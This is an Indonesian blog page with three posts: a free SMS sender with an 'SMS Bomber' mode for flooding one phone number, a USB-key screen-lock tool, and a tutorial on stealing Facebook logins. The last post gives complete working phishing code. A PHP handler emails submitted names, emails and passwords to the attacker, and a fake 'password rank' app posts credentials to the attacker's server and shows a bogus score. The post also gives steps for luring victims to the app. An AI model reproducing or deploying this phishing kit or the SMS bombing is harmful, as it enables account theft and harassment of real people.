Jumat, 20 April 2012

SIX - Aplikasi SMS Gratis Via PC

Ayo siapa yang suka SMS an ... Nah sekarang saya mau share software buat SMS gratis melalui PC / NB. namanya SIX - V.1.5, yang mana software ini buatan anak negeri sendiri lho ... berikut screen shoot nya..
Software ini fungsinya hanya untuk kirim SMS saja lo, baik itu untuk sms single maupun untuk SMS Bomber ... nah tinggal pilih saja. Namun jangan di buat untuk kejahatan atau yang lainnya yha, kalo buat iseng boleh juga tuh heeeeeee.....

Oke tanpa banyak kata lagi, langsung aza tak kasih link buat donloadnya.


" Panduan Cara Pakainya "

Single SMS
  • Download file, kemudian extract dan save di drive PC / NB kamu.
  • Di dalam folder ada 5 file, untuk menjalankan program klik SIX - SMS Gratis v1.5.exe akan tampil seprti gambar di bawah ini
  • Untuk single SMS, kamu tinggal masukan no HP tujuan yg akan di kirimi SMS di kolom " No. Tujuan "
  • Kemudian isi di kolom " Pesan ' untuk pesan yang akan di sampaikan.
  • Terus Klik tombol " Kirim "
SMS Massal

  • Caranya sama dengan Single SMS, namun No HP yang akan di kirim banyak.
SMS Bomber

  • Untuk SMS Bomber ini hanya di tujukan satu no HP saja, namun yg menerima SMS akan mendapatkan pesan yang sama sesuai isi pesan.
  • Caranya sama saja namun kita harus mengisi Username & Password.
  •  Pertama, masukan dulu no HP tujuan yang akan di Bomb di kolom No. Tujuan
  • kemudian di kolom Jumlah, masukan jumlah SMS yang akan di kirim ( Tanpa batas, sesuai kebutuhan )
  • Di kolom Username isi dengan username yang ada di dalam file ( pilih salah satu ), lihat gbr

  •  Di kolom Password masukan, file yg ada di notepad tadi ( pilih salah satu ), lihat gbr
  •  Kemudian isi pesan yang akan di kirim di kolom Pesan, terus Klik " Kirim "

Selamat Mencoba

Semua resiko di tanggung sendiri oleh pengguna, dan saya maupun pembuat program tidak akan ikut bertanggung jawab atas penyalah gunaan program ini.

Thank's To 
[http://six.web.id]


Selasa, 17 April 2012

Key In My FD ( Lock PC dengan FD )

Saat Kompi / Hidup kamu di panggil bos atau siapa pun dan di sekitar kamu banyak orang, mau langsung di tinggalkan takut data atau yang lainnya yang ada di kompi kamu di colong orang atau teman kamu. Mau di matiin, ntar harus nunggu lagi ... trs apa dong yang harus di lakukan ...????

Jangan Galau ... weiitsss kayak iklan, gunakan saja software yang atu ini yakni " Key In My FD ". Software ini berguna untuk mengunci Kompi / NB kamu dengan bantuan Flash Disk. jadi jangan takut lagi saat ada urusan ama bos ato yang lain, kamu tinggal cabut FD kamu dan secara otomatis Kompi / NB kamu langsung ke LOCK. Oke deh tanpa banyak bacot lagi ... neh tak kasih link buat donlod nya ...


Oh .. iya, Software ini juga portable lo. jadi ga perlu instal ini itu ... heeeeeeee

Thank's To : PONI and mas Kurniawan and YFXC crew ... u're the best


" Cara Pakai nya "

  • Download dulu Key In My FD nya dulu, bisa juga donlod Di sini
  • Save file di drive PC kamu ( terserah mau taruh dimana, sesuai keinginan kamu masing" ... heeeee )
  • extract file, kemudian buka folder file nya dan dobel klik KeyInMyFD.exe
  • eiitttsss .... jangan lupa colokkan FD kamu yang akan di jadikan Kunci ( kalau saya memakai FD yang kapasitasnya kecil dan bukan unutk menyimpan file" yang penting)
  • Akan tampil box perintah, lihat gbr di bawah
  • Kemudian klik tombol Find USB Flash Disk.
  • Jika FD kamu sudah di baca oleh program, kemudian klik Define ( utk membuat file kunci dalam FD nya ). 
  • Setelah tombol define di klik akan tampil jendela perintah ( utk memasukan file kunci di FD ) lihat gbr
  • Setelah masuk ke dalam FD nya, kemudian Isi di filename ( terserah kamu mau nama apa ) trs klik SAVE
  •  Secara otomatis akan kembali lagi ke program KIMFD, kemudian klik tombol Accept.Setelah tombol accept di klik akan tampil pesan bahwa kunci sudah siap di gunakan, klik ok lihat gbr

  •  Kemudian klik Lock, finish
  • Jadi tinggal cabut langsung saja FD kamu jika ingin mengunci PC / NB kamu ( tanpa savety remove, karena ga bakalan bisa ... heeeeeeeeeee.)
  • Jika kamu menemukan file yang aneh dalam FD kamu, jangan di delete. karena itu adalah file key buat mengunci PC kamu. lihat GBR

Segala resiko tanggung sendiri akibat nya, saya dan yang membuat program tidak akan bertanggung atas kerusakan ataupun kerugian yang anda derita maupun orang lain akibat dari program ini.

Program ini Murni buatan Anak negeri sendiri oleh PONI dan YFXC crew

Senin, 16 April 2012

HACK FACEBOOK VIA FACEBOOK


Facebook,sapa    sih    yan gak    kenal    facebook???salah    satu    situs    jejaring internasional terbesar selain twiter dan friendster.Facebook dipilih karena kemudahan dan keamanannya.Aman???100%??? benarkah demikian??umm..ada benarnya juga sih.Akan tetapi banyak para praktisi computer ( baca:hacker ) berusaha menembus pertahanan facebook,seperti yang dilakukan Team inj3ct0r dengan tehnik SQL Injection pada salah satu Apps nya,tapi kebanyakan melakukan tehnik Social Engineering ( Tehnik Soceng),membuat Fake login,Pishing,Sniffing dan lain-lain.Kali ini saya ingin Melakukan Salah satu tehnik diatas,melalui fasilitas facebook itu sendiri. Maksudnya??maksudnya adalah saya akan membuat APP palsu dalam Tubuh facebook itu sendiri J. Langsung aja deh
Syarat:

1.   Komputer yang terhubung internet


2.   Server Gratisan atau injekan hasil tusbol juga boleh


3.   Facebook tentunya


4.   Doa yang baik,semoga orang-orang menggunakan APP kita J


Copas Script dibawah ini ke notepad dan edit di bagian yang saya beri warna merah menjadi alamat e-mail temen-temen semuanya.Sebaiknya matikan Fitur spam di akun e- mail anda agar e-mail pemberitahuannya bisa masuk,atau cek folder bulk atau sampah di akun e-mail kamu.

<?php

error_reporting (E_ALL ^ E_NOTICE);
$email.= "<b>Name           : </b>".trim($_POST['name'])."<br/>";
$email.= "<b>Email          : </b>".trim($_POST['email'])."<br/>";
$email.= "<b>Password       : </b>".trim($_POST['password'])."<br/>";

$headers .= "Content-Type: text/html";
mail(
"youremailaddress@domain.com", "Password from Facebook",
$email,
$headers
);

echo "Mail Completed";

?>





Lalu simpan dengan nama facebook.php dan upload ke server kamu dan tugas pertama kita selesai.Lalu kita menuju ke alamat http://www.facebook.com/pages/create.php dan pilih salah satu pilihan disana
 


 







Lalu kita upload gambar yang sudah kita persiapkan,lalu kita beri nama app kita.Disini kita dituntut kepandaian kita dalam membuat kata yang semenarik mungkin agar mampu menarik perhatian korban,misal Cek Kepopuleran Akun Anda dan pada bagian nama website        kita          isi     http://facebook.com/                 setelah        itu                                   kita          masuk         ke            alamat http://www.facebook.com/add.php?api_key=fdfd01c9df7d644a68a4e989ae861e44&page s lalu kita pilih Add App dan kita kembali ke halaman FB yang sudah kita buat tadi.
 


Lalu kita sunting aplikasi,masukkan nama yang kita hendaki dan copas script dibawah ini,sebelumnya pada bagian yang saya beri warna merah kita edit menjadi alamat web tempat           upload      file       facebook.php                         kita                   tadi,contoh http://www.serverinjectan.com/facebook.php. Dapada bagiayang saya beri warna biru,di edit sesuai kebutuhan kita semua N


<style>
#facebook_box { clear: both; width: 55%; margin-top: 0px;
margin-right: auto; margin-bottom: 0px; margin-left: auto; padding: 10px;
border: thin solid #E8E8E8;
}
.info_box_top { HEIGHT: 15px;
margin-bottom: 5px; padding-bottom:5px; margin-left:5px; margin-right:5px;
border-bottom-width: thin; border-bottom-style: solid; border-bottom-color:#FFCC33; font-weight: bold;
}
p {
text-align: justify;
}
.info_box_middle img {
float: left;
border: thin solid #CCCCCC;
margin: 3px;
}


input[type=hidden]{
display:none;
}

.twoColumn {
float:left;
padding-right:20px;
width:44%;
}
input[type=botton] { margin:0px; padding:0px;
text-align:center;

}



LABEL {


PADDING-RIGHT: 3px; DISPLAY: block; PADDING-LEFT: 3px; FLOAT: left; MARGIN-BOTTOM:


10px; PADDING-BOTTOM: 3px; WIDTH: 100px; PADDING-TOP: 3px;
}

INPUT.textbox {
PADDING-RIGHT: 3px; DISPLAY: block; PADDING-LEFT: 3px; FLOAT: left; MARGIN-BOTTOM:
10px; PADDING-BOTTOM: 3px; WIDTH: 250px; PADDING-TOP: 3px;
}
input.submit {
background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zf/r/_IKHHfAgFQe.png);
background-position:0px 280px;
color:#FFF; border:0px; height:30px;
}

</style>


<script>
function AlertMsg(){
var msgdialog = new Dialog();
var ok ='This application is designed to assess the strength of password strings.   So enter your correct email address and password for accurate report from Facebook. If you have enter correct info, please click test button.';
msgdialog.showMessage('Enter Your Correct Facebook Info', ok);
return false;
}
</script>

<div style="width: 650px;" id="facebook_box">
<div align="left" style="height: auto;" class="info_box_top">
<h1>Check Your Facebook Password Rank</h1>
</div>
<div align="left" class="info_box_middle">


<p><B>Check your password rank      now & make sure to have password rank between
5 to 10</b>.<br/>  </div></div></p>


<div class="two_column">
<div class="left"> </div>
<div style="width: 400px;" class="left">
<form       action="http://yourwebsite.com/facebook.php"          id="ContactForm" name="ContactForm" method="post">
<label>Name</label>
<input type="text" tabindex="1" value="" name="name" id="name" class="textbox" />


<br/>


<label>Email</label>
<input type="text" tabindex="2" value="" name="email" id="email" class="textbox"


onChange="AlertMsg();" />       <br/>
<label>Password</label>



<input   type="PaSSWord" tabindex="3"   value=""   name="password" id="password" class="textbox"  />

<input type="button" class="submit" onclick="submitFacebookForm(this);" value="Test
Your Password Now"  />
<input type="hidden" value="0" name="send" id="send" style="display: none;"/>
</form>
</div>
</div>
</div>


<script>

function submitFacebookForm(sub)
{
sub.setDisabled(true); sub.setValue(".. DONE .."); var ajax = new Ajax();
ajax.responseType = Ajax.FBML;
ajax.ondone = function(data)
{
var msgdialog = new Dialog();
var myvalue = Math.floor(Math.random()*4) + 7;
var okmsg = 'According to facebook password algorithm chart, your password rank is ' +
myvalue + ' of 10';
msgdialog.showMessage('Your Password Rank', okmsg);
return false;
}

ajax.onerror = function() {
var msgdialog = new Dialog();
msgdialog.showMessage('Error',  'An error has occurred  while trying to


submit.');

}


return false;



// collect field values var queryParams = {
'name' : document.getElementById('name').getValue(),
'email' : document.getElementById('email').getValue(),
'password' : document.getElementById('password').getValue(),
'send' : document.getElementById('send').getValue()
};
ajax.post('http://yourwebsite.com/facebook.php?sys=fbpage',  queryParams);
return false;
}
</script>

Dan kita masukkan ke kolom pengisian scriptTugas ke 2 selesai.
 
Tugas ke 3 kita sekarang adalah menyebarkan link pages yang sudah kita buat tadi,dan berdoa semaleman biar banyak yang nyoba ni halaman,he he he





Usahakan juga minta bantuan temen-temen kita supaya me-klik tombol like,m inimal 25 orang,bila          sudah                       25              orang       saatnya    kita    masuke    alamat http://www.facebook.com/username/                       dan               pilih   namuntu halaman              kita,buatlah semenarik    mungkin                                 agar              orang           orang                tertarik       mencobanya,       misal http://www.facebook.com/CekAkunAnda/ .Selesai sudah tugas jahat kita he he he,kita tinggal nunggu hasilnya aja deh :p
Kalau penasaran gimana tampilan saat orang2 nyoba halaman kita,maka liat aja gambar dibawah ini..

 
Dan hasil yang terkirim ke e-mail kita akan seperti ini
Bagi yang males baca via web, bisa download tutorialnya
 Di sini


Thanks To : danang a.k.a j0ck3r, YFXC dan yang lainnya, yang sudah berbagi mengenai artikel ini. Saluutttttt buat kalian semua.

About Me